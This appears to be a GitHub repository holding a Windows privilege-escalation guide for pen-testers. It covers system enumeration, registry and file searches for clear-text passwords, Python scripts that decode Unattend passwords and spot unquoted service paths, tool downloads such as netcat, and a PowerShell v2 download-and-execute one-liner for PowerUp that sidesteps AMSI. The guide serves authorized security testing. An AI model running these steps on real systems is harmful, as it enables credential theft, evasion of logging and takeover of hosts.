├── README.md
└── index.md

/README.md:
--------------------------------------------------------------------------------
# What is this?
A step-by-step guide to performing Windows privilege escalation from a limited shell to SYSTEM by abusing misconfigurations and local exploits.
We call it "WPECS" for short; it can be read at [AddaxSoft.com/WPECS](https://addaxsoft.com/wpecs) with a dark, easy-to-read theme.



# Contributions
You can contribute by forking the repository, modifying index.md and sending a pull request to the master branch.
Please read "Format and Rules" and stick to them to make life easier for everyone.
If you need markdown (.md) help, read this quick [guide](https://guides.github.com/features/mastering-markdown/) by GitHub.
The best place to start is the open [issues](https://github.com/AddaxSoft/OSWindowsPrivEscalation/issues).


## Format and Rules
- We use 4 spaces until I figure out how to turn tabs on (yes, I'm a tab guy)
- 3 line feeds before each H1 headline
- 2 line feeds before each H2 headline
- Each major section (e.g. OS Enumeration) is an H1 headline
- Each subsection (e.g. searching for passwords in files, under looting clear-text passwords) is an H2 headline
- After each "chunk" of the document we add an HTML line break using `<br>`
- If we ever use screenshots we try to be as specific as possible; animated GIFs are even better.


## Tips
- You can use `[Another section](#new-section)` to refer to a headline (e.g. [this](#Format-and-Rules) refers to Format and Rules)



# todos
- [x] Set up the initial template
- [x] Find a cooler + catchy name for the project
- [x] Test the template rendering
- [x] Test webserver streaming
- [x] Open contributions
- [x] Write the enumeration phase
- [x] Add format + contributions sections to the readme.md
- [x] Do some testing regarding console aliases
- [x] Test PowerShell calls (since we will run them non-interactively)
- [ ] Write some scripts for enum
- [x] Shadow of gatherNetworkInfo.vbs [info](http://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/)
- [ ] Add TightVNC portable server [page](https://sourceforge.net/projects/vnc-tight/files/TightVNC-win32/1.3.10/tightvnc-1.3.10_x86.zip/download)
--------------------------------------------------------------------------------
/index.md:
--------------------------------------------------------------------------------
# About this document
This document is an open-source markdown document that can be contributed to via GitHub.
If you see a typo, a bug or a mistake, an improvement, or a vector that we've missed, please send me a pull request to the master branch via the
[repo link](https://github.com/AddaxSoft/OSWindowsPrivEscalation) and I will review it and approve it if appropriate asap.

This document is meant for pen-testers, red teams, and the like.

**Needless to state:** you're responsible for what you're doing :-)



# Notes & Format
- Commands should be copiable from the boxes; Windows inline command comments are written as `command &:: comment`, so the line still works when you copy-paste it (`::` is a label, which cmd silently ignores).
  Think of it as the hash `#` in Linux.
- If two commands are required, combine them into one line using the `&` delimiter.
- If a command is an alternative to another, use the `||` delimiter so the second command runs only when the first one fails.



# Contributors
- AK | Author and Maintainer [amAK.xyz](https://imAK.xyz), [@xxByte](https://twitter.com/xxByte)


------

Let's get to it!



# OS Enumeration
In this stage you want to learn as much as possible about the operating system.
Note anything odd and investigate it until you hit a dead end, then move on to the next thing.


## Windows Version and Configuration
Which Windows is it, and which version? The exact version and build are what you match local exploits against.

    systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which architecture, x86 or x64? Exploits and tool binaries must match it.

    wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

Are you on Windows 7 or higher? Then you can skip the rest of the manual OS enumeration and use the built-in `gatherNetworkInfo.vbs` script, which does most of the OS enumeration for you. Read more about it [here](https://answers.microsoft.com/en-us/windows/forum/windows_7-security/does-anyone-know-what-gathernetworkinfovbs-is-its/63a302a6-cf69-4b9a-a3ef-4b2aff1b2514). The one-liner below generates a `config` folder containing the output text files, which hold very juicy info.
To understand what is being generated, look at the source of the script: `c:\windows\system32\gatherNetworkInfo.vbs`

Note: some txt files will contain errors because you're not admin (yet).
    cd %TEMP% & cscript c:\windows\system32\gatherNetworkInfo.vbs & cd config & dir

List all environment variables (paths, usernames and the occasional secret end up here)

    set

List all drives

    wmic logicaldisk get caption || fsutil fsinfo drives


## Users Enumeration
Get the current username

    echo %USERNAME% || whoami

List all local users, then dump the current user's SID, groups and privileges (pay attention to the privileges section)

    net user
    whoami /all

List the account and lockout policy; check it before any bruteforcing so you don't lock accounts out

    net accounts

Get details about a user (i.e. administrator, admin, current user)

    net user administrator
    net user admin
    net user %USERNAME%

List all local groups

    net localgroup

Get details about a group (i.e. administrators)

    net localgroup administrators


## Network Enumeration
You will want to know how this host is connected: what kind of protocols and services are running, and finally maybe even tap into one of the interfaces and learn what's going on.


List all network interfaces

    ipconfig /all

List the current routing table

    route print

List the ARP table

    arp -a

List all current connections and listening ports with their owning PID (services bound only to 127.0.0.1 are reachable from this box alone and are prime candidates for local exploits or a port forward)

    netstat -ano

List the firewall state and the current rules

    netsh advfirewall show allprofiles & netsh advfirewall firewall show rule name=all

List all network shares

    net share



# Looting any clear text passwords
Many admins store clear-text passwords on the file system. Your targets are usually xml, txt and xls files that contain the word pass/password.
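As an added worked example for this section (my code, not part of the original WPECS guide): the sysprep/Unattend answer files listed under "Searching in files" store passwords either in plain text or "encoded". The encoding is the one Windows System Image Manager uses: base64 over the UTF-16LE string made of the password with the element name appended (`AdministratorPassword` or `Password`), so it reverses with no key at all. The script parses an answer file and prints every account/password pair it finds. The XML embedded in it is a constructed sample; the account names and passwords in it are made up.

```python
"""Decode passwords from sysprep / Unattend answer files.

Added example for the "Looting" section; it is not part of the WPECS guide.
Windows System Image Manager writes <Password> and <AdministratorPassword>
values either in plain text (<PlainText>true</PlainText>) or "encoded":
base64 of the UTF-16LE string  password + element name  (for example
"s3cret" + "AdministratorPassword"). That is an encoding, not encryption,
so no key is needed. SAMPLE_UNATTEND below is a constructed file in the
real answer-file layout; on a target, point the script at the files listed
under "Searching in files" instead.
"""
import base64
import sys
import xml.etree.ElementTree as ET

PASSWORD_TAGS = {"Password", "AdministratorPassword"}


def encode_unattend(password, tag):
    """WSIM's obfuscation; used here only to build the sample and round-trip it."""
    return base64.b64encode((password + tag).encode("utf-16-le")).decode("ascii")


def decode_unattend(value, tag):
    """Reverse encode_unattend(); tolerates values written without the suffix."""
    raw = base64.b64decode(value).decode("utf-16-le")
    return raw[: -len(tag)] if raw.endswith(tag) else raw


# Constructed sample answer file (not from any real host).
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>{encode_unattend('Summer2019!', 'Password')}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_unattend('L0calAdm!n', 'AdministratorPassword')}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" wcm:action="add">
            <Password>
              <Value>Welcome1</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>helpdesk</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    """Strip the {urn:...} namespace ElementTree prepends to every tag."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name, default=None):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return default


def extract_passwords(xml_text):
    """Return [(account, password, was_encoded)] for every password element."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag not in PASSWORD_TAGS:
            continue
        value = _child_text(elem, "Value")
        if not value:
            continue
        encoded = _child_text(elem, "PlainText", "true").lower() == "false"
        password = decode_unattend(value, tag) if encoded else value
        if tag == "AdministratorPassword":
            account = "Administrator"
        else:  # <AutoLogon> carries <Username>, <LocalAccount> carries <Name>
            parent = parents[elem]
            account = _child_text(parent, "Username") or _child_text(parent, "Name") or "<unknown>"
        found.append((account, password, encoded))
    return found


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_UNATTEND
    for account, password, encoded in extract_passwords(text):
        print(f"{account:<16} {password:<20} {'base64' if encoded else 'plain'}")
```

Run it with the path of an answer file copied off the target (`python unattend_pw.py Unattend.xml`), or with no argument to see it work on the sample. Group Policy Preferences `cpassword` values are a different case: those are AES-encrypted with a key Microsoft published, which is what gpprefdecrypt.py handles.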


## Searching in files
Quick peek into common password files

Note: these answer files store passwords either in plain text or base64-encoded; that is an encoding, not encryption. Encrypted `cpassword` values belong to Group Policy Preferences files (e.g. Groups.xml in SYSVOL); decrypt those with gpprefdecrypt.py, which uses the AES key Microsoft published.

    TYPE c:\sysprep.inf
    TYPE c:\sysprep\sysprep.xml
    TYPE %WINDIR%\Panther\Unattend\Unattended.xml
    TYPE %WINDIR%\Panther\Unattended.xml

Search file contents

    cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt

Search for files with a certain filename

    dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*


## Searching in Registry
Search the registry for key names (key names have no data type, so `/t` does not apply here)

    REG QUERY HKLM /F "password" /S /K
    REG QUERY HKCU /F "password" /S /K

Search the registry for clear-text passwords in value data

Note: the data of each matching value is printed as well

    REG QUERY HKLM /F "password" /t REG_SZ /S
    REG QUERY HKCU /F "password" /t REG_SZ /S

Read the value of a specific key

    REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList


## Processes Enum
What processes are running?

    tasklist /v

Which processes are running as SYSTEM? (As a non-admin you only see the owner of your own processes; every other process shows `N/A`, so this filter is only reliable once you're elevated.)

    tasklist /v /fi "username eq NT AUTHORITY\SYSTEM"

Do you have PowerShell magic? (The `\1\` key reports the v1/v2 engine; a `\3\` key next to it exists only when PowerShell 3 or newer is installed.)

    REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion


# Tools and Binaries
In this section you will find the basic binaries that make your life a bit easier, such as zip, unzip, wget, and the rest.
These tools are meant for running local exploits or fetching other privilege-escalation scripts that do deeper scanning for you.


## (De)compressing files
Download the unzip binary for Windows from [here](http://gnuwin32.sourceforge.net/packages/unzip.htm).
Unzip it on your attacker host, then serve /bin/unzip.exe via an HTTP server to your target host.

    unzip.exe -h &::#usage
    unzip.exe file.zip &::#extract


For compression (zip) follow the same steps as above; the only difference is the binaries, which you can get [here](http://gnuwin32.sourceforge.net/packages/zip.htm).
zip also depends on bzip2.dll, which has to be in the same folder and can be downloaded from the same link ^
Once you have the binary and the dependency dll on the target you can run:

    zip -h &::#for usage
    zip -9 out.zip file.txt file.jpg file.xls &::#compress files
    zip -9 -r out.zip c:\some\directory\ &::#compress a directory
    zip -e -P PASSWORD_HERE -9 out.zip file1.txt file2.xls file3.jpg &::#compress and encrypt with a password
    zip -e -P PASSWORD_HERE -9 -r out.zip c:\some\directory &::#same as above but for directories

Note: `-P` puts the password on the command line (visible in process listings), and zip's legacy encryption is weak; it keeps casual eyes off your loot, nothing more.


## Uploading / Downloading files
A wget using PowerShell (`wget` is an alias of Invoke-WebRequest, which needs PowerShell 3 or newer; on v2 use `(New-Object Net.WebClient).DownloadFile(url, path)` instead)

    powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"

wget using bitsadmin (when PowerShell is not present)

    cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"

Now you have wget.exe, which can be executed from `%TEMP%\wget.exe`.
For example, I will use it here to download netcat

    %TEMP%\wget.exe https://addaxsoft.com/download/wpecs/nc.exe



# Abusing Weak Services
This is the section where "shit gets real".
If you have no PowerShell, skip the first part of this section and go to the manual way.
If you do, you're in a bit of luck: you can automate this using PowerSploit > Privesc > PowerUp.

## Spot the weak service using PowerSploit's PowerUp
Usage and details of this script can be found [here](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc).
`-Version 2` requests the old engine (it sidesteps the logging and AMSI hooks of newer engines, but fails where the v2 engine is not installed; drop it then), `-nop` skips the profile and `-exec bypass` lifts the execution policy. The URL below is the older PowerTools copy of PowerUp; the maintained one lives in the PowerSploit repo linked above.

    powershell -Version 2 -nop -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"



-----

# Special Thanks & Original Inspirations
- This document wouldn't be here if I hadn't had some inspirations:
- fuzzysecurity's ultimate guide to Windows privilege escalation, which can be found under this [link](http://www.fuzzysecurity.com/tutorials/16.html).
- g0tmi1k's Basic Linux Privilege Escalation, which can be found under this [link](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- Peter Kim's Hacker Playbook 2 - Zero to Hero section [link](http://thehackerplaybook.com/dashboard/)
- Offensive Security, which pushed me really hard beyond my limitations during the many hours of training.
--------------------------------------------------------------------------------
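Added example for the "Abusing Weak Services" section, placed here at the end of the document; this is my code, not part of the WPECS guide and not PowerUp. It performs offline one of the checks `Invoke-AllChecks` runs on the box: find services whose unquoted ImagePath contains spaces, list the bogus executables Windows would try before the real binary, and name the directories whose ACLs you must check with `icacls` (one writable directory on that chain means your payload starts as the service account). It assumes you exported `wmic service get Name,PathName,StartMode /format:csv` to a file on the target; the CSV embedded in the script is a constructed sample, with made-up service names and paths.

```python
"""Spot unquoted service paths offline from a `wmic service` CSV export.

Added example for the "Abusing Weak Services" section; it is not part of the
WPECS guide and is not PowerUp. On the target run
    wmic service get Name,PathName,StartMode /format:csv > svcs.csv
(redirected wmic output is UTF-16LE, hence encoding="utf-16" below) and feed
the file to this script. When an ImagePath is unquoted and contains spaces,
CreateProcess tries every prefix ending at a space as "<prefix>.exe" before
reaching the real binary; a writable directory on that chain means your
payload starts as the service account. WMIC_SAMPLE is a constructed export.
"""
import ntpath
import sys

# Constructed sample in wmic's CSV layout (service names and paths are made up).
WMIC_SAMPLE = r"""
Node,Name,PathName,StartMode
WKSTN01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WKSTN01,AgentSvc,C:\Program Files\Acme Corp\Agent\agentsvc.exe -k service,Auto
WKSTN01,BackupSvc,"C:\Program Files\Acme Corp\Backup\backup.exe" /svc,Manual
WKSTN01,OldTool,C:\Tools\Old Tool\run.exe,Disabled
WKSTN01,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs -p,Manual
"""


def parse_wmic_csv(text):
    """Parse wmic's CSV (Node,Name,PathName,StartMode). wmic never quotes its
    fields, so split on the first two commas and the last one; that keeps a
    comma inside PathName intact, and keeps the double quotes of a quoted
    ImagePath, which csv.DictReader would strip and which we need to see."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,") or line.count(",") < 3:
            continue
        _node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)
        rows.append({"name": name, "pathname": pathname, "startmode": startmode})
    return rows


def unquoted_candidates(pathname):
    r"""Return the bogus executables Windows would try before the real one
    (e.g. C:\Program.exe, C:\Program Files\Acme.exe), or [] when the path is
    quoted, has no spaces, or is a bare driver path without .exe."""
    if not pathname or pathname.startswith('"'):
        return []
    idx = pathname.lower().find(".exe")
    image = pathname[: idx + 4] if idx != -1 else pathname.split(" ")[0]
    if " " not in image:
        return []
    parts = image.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted_services(csv_text):
    """Services with a hijackable path, plus the directories whose ACLs you
    must check on the box (icacls <dir>); writable by your user = win.
    Auto-start services are the best targets: a reboot triggers them even
    when you lack the right to stop and start the service yourself."""
    hits = []
    for svc in parse_wmic_csv(csv_text):
        cands = unquoted_candidates(svc["pathname"])
        if cands:
            hits.append(dict(svc, candidates=cands,
                             check_dirs=sorted({ntpath.dirname(c) for c in cands})))
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else WMIC_SAMPLE
    for h in find_unquoted_services(text):
        print(f'[{h["startmode"]:<8}] {h["name"]}: {h["pathname"]}')
        for d in h["check_dirs"]:
            print(f'    check ACL: icacls "{d}"')
```

The script deliberately stops at naming the directories: whether they are writable can only be answered on the target (`icacls "C:\Program Files"` and friends), and a quoted ImagePath or one under `C:\Windows` will normally show up as not exploitable at that step.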